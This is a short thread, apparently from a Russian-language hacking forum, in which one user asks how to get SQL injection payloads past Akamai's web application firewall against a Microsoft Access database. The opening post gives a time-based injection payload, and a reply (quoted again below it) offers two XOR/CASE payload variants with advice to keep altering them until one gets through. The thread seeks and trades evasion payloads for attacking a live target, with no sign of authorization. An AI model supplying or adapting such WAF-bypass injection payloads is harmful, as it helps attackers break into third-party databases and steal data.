• XSS.stack #1 – первый литературный журнал от юзеров форума

sql-inj to bypass akamai

thegovenor

floppy-диск
Пользователь
Регистрация
30.08.2023
Сообщения
6
Реакции
2
during my research I found a payload that used to bypass akamai in order to achieve sql injection: 'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
However, it has been fixed by akamai waf of course and it blocks it.
Can you please share any resources that will help me craft my own payload against Microsoft Access db that is protected by Akamai ?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
I remember, I did bypass this Akamai with some changing the payload. I don't remember what was my bypass payload.

Try this and if not works, change the parts.
XOR(1)=XOR(SELECT CASE WHEN (1*5!=3) THEN 1 ELSE 2 END)
XOR(SELECT 1/1 CASE WHEN ('1'*5<>3) THEN 1 END)
--

I saw it's MS Access dbms, I suggest you try something that specified to ms access dbms.
 
I remember, I did bypass this Akamai with some changing the payload. I don't remember what was my bypass payload.

Try this and if not works, change the parts.
XOR(1)=XOR(SELECT CASE WHEN (1*5!=3) THEN 1 ELSE 2 END)
XOR(SELECT 1/1 CASE WHEN ('1'*5<>3) THEN 1 END)
--

I saw it's MS Access dbms, I suggest you try something that specified to ms access dbms.
Thank you!
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх